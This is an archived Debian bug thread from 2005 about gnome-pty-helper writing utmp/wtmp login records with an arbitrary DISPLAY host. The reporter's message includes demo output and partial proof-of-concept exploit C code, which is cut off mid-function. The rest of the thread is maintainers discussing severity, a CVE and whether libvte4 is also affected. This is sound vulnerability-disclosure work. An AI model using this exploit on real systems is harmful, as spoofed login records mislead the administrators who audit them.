subject:"Bug#329156\: \/usr\/sbin\/gnome\-pty\-helper\: writes arbitrary utmp records"

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-30 Thread Loïc Minier

tags 329156 + upstream security
forwarded 329156 http://bugzilla.gnome.org/show_bug.cgi?id=317312
clone 329156 -1
reassign -1 libvte4
thanks

[ THIS IS A RESEND, PREVIOUS MAIL WAS LOST. ]

Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

 This vulnerability is identified as CAN-2005-0023.  The upstream
 developers of vte have been notified of the bug at:


 Bye,
-- 
Loïc Minier <[EMAIL PROTECTED]>

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Paul Szabo

Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole


gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.

Demo output, code below.

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of SydneyAustralia


OUTPUT:

[EMAIL PROTECTED]:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep 
psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz  pts/2Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz  pts/2Sep 20 08:40 (xyz)
psz  pts/1Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER   PID %CPU %MEM   VSZ  RSS TTY  STAT START   TIME COMMAND
psz  31358  0.0  0.3 10340 7768 ?S08:14   0:00 xterm -T [EMAIL 
PROTECTED] -n [EMAIL PROTECTED] -sb -sl 1 -ls
psz  31444  0.0  0.0  1484  380 pts/1S08:21   0:00 
gnome-pty-helper-exploit xyz
psz  31446  0.0  0.0  1696  604 pts/1S08:21   0:00 gnome-pty-helper
psz  31454  0.0  0.0  2496  848 pts/1R+   08:21   0:00 ps aux
[1]+  Donegnome-pty-helper-exploit xyz
psz  pts/1Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)


CODE:

/*
Must be compiled against (within)
gnome-libs-1.4.2/zvt
because it uses *.h files from there.
Code "stolen" from subshell.c .
*/

#include 

#include "subshell-includes.h"
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG  4

/* Pid of the helper SUID process */
static pid_t helper_pid;

/* The socketpair used for the protocol */
int helper_socket_protocol  [2];

/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];

#include 
#include 

static struct cmsghdr *cmptr;
#define CONTROLLEN  sizeof (struct cmsghdr) + sizeof (int)

static int
receive_fd (int helper_fd)
{
struct iovec iov [1];
struct msghdr msg;
char buf [32];

iov [0].iov_base = buf;
iov [0].iov_len  = sizeof (buf);
msg.msg_iov  = iov;
msg.msg_iovlen   = 1;
msg.msg_name = NULL;
msg.msg_namelen  = 0;

if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
return -1;
msg.msg_control = (caddr_t) cmptr;
msg.msg_controllen = CONTROLLEN;

if (recvmsg (helper_fd, &msg, 0) <= 0)
return -1;

return *(int *) CMSG_DATA (cmptr);
}

static int
s_pipe (int fd [2])
{
return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}

static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
GnomePtyOps op;
int result, n;
void *tag;

if (helper_pid == -1)
return NULL;

if (helper_pid == 0){
if (s_pipe (helper_socket_protocol) == -1)
return NULL;

if (s_pipe (helper_socket_fdpassing) == -1){
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
return NULL;
}

helper_pid = fork ();

if (helper_pid == -1){
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
close (helper_socket_fdpassing [0]);
close (helper_socket_fdpassing [1]);
return NULL;
}

if (helper_pid == 0){
close (0);
close (1);
dup2 (helper_socket_protocol  [1], 0);
dup2 (helper_socket_fdpassing [1], 1);

/* Close aliases */
close (helper_socket_protocol  [0]);
close (helper_socket_protocol  [1]);
close (helper_socket_fdpassing [0]);
close (helper_socket_fdpassing [1]);

execl ("/usr/sbin/gnome-pty-helper", 
"gnome-pty-helper", NULL);
exit (1);
} else {
close (helper_socket_fdpassing [1]);
close (helper_socket_protocol  [1]);

/*
 * Set the close-on-exec flag for the other
 * descriptors, these should never propagate
 * (otherwise gnome-pty-heler wont notice when
 * this process is killed).
 */
fcntl (helper_socket_proto

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Steve Langasek

On Tue, Sep 20, 2005 at 09:01:20AM +1000, Paul Szabo wrote:
> Package: libzvt2
> Version: 1.4.2-19
> Severity: critical
> File: /usr/sbin/gnome-pty-helper
> Justification: root security hole

> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

Why is this filed at severity: critical?  What is the attack vector here
which permits root privilege escalation?

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


signature.asc
Description: Digital signature

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Paul Szabo

Steve,

>> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
>> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
>> existing records.
>
> Why is this filed at severity: critical?  What is the attack vector here
> which permits root privilege escalation?

I do not know any root escalation methods. When using reportbug, those
options seemed to fit best, apologies if they were not; please change if
appropriate. (For future reference: which options should I have used
instead?)

(In fact cannot think of any attacks: cannot think of any "important" uses
of utmp/wtmp files. I use utmp in some of my own scripts, that is how I
looked at gnome-tty-helper.)

Cheers, Paul

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of SydneyAustralia


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Steve Langasek

On Tue, Sep 20, 2005 at 11:05:10AM +1000, Paul Szabo wrote:

> >> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> >> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> >> existing records.

> > Why is this filed at severity: critical?  What is the attack vector here
> > which permits root privilege escalation?

> I do not know any root escalation methods. When using reportbug, those
> options seemed to fit best, apologies if they were not; please change if
> appropriate. (For future reference: which options should I have used
> instead?)

Hmm... After rereading the definition at
, I guess there's no reason
for this bug to not fall under the description of 'critical', since the
security hole is present just from the installation of the package.

Cheers,
-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


signature.asc
Description: Digital signature

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Loïc Minier

Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

 Thanks for your report.

 Do you have a CVE ID for this security issue?

 Did you check whether libvte4 is affected?

 Do you have a fix?

   Thanks,

-- 
Loïc Minier <[EMAIL PROTECTED]>

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Paul Szabo

Dear Loic,

>  Do you have a CVE ID for this security issue?

No. Sorry, I do not know how to get one. (Nor am sure if this is serious
enough to deserve one.)

>  Did you check whether libvte4 is affected?

No. Do not know what libvte4 is.

>  Do you have a fix?

No. (Fanciful idea: try running xhost, if it fails then surely you do not
"own" that display. Slow, maybe secure. That is what I use now.)

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of SydneyAustralia


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Loïc Minier

On Mon, Sep 26, 2005, Paul Szabo wrote:
> No. Sorry, I do not know how to get one. (Nor am sure if this is serious
> enough to deserve one.)

 Then I'll see whether it deserves one, and attempt to request one.

> >  Did you check whether libvte4 is affected?
> No. Do not know what libvte4 is.

 libvte4 is the GNOME 2 zquivalent of libzvt2, you can grab it from:

 the source package for this library is "vte".

 I'd be nice if you could check whether the gnome-pty-helper shipped in
 libvte4 is affected too.  Let me know if you don't have a setup
 permitting the check, or if you lack the time.

   Bye,

-- 
Loïc Minier <[EMAIL PROTECTED]>

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Paul Szabo

Dear Loic,

>> >  Did you check whether libvte4 is affected?
>> No. Do not know what libvte4 is.
>
> libvte4 is the GNOME 2 zquivalent of libzvt2 ...
> I'd be nice if you could check whether the gnome-pty-helper shipped in
> libvte4 is affected too.  Let me know if you don't have a setup
> permitting the check, or if you lack the time.

Looking at the source

  vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c

in line 682 it grabs 
display_name = getenv ("DISPLAY");
and uses it without any sanity checks: yes, surely it is also affected.

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of SydneyAustralia


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

9 matches

Site Navigation

Mail list logo

Footer information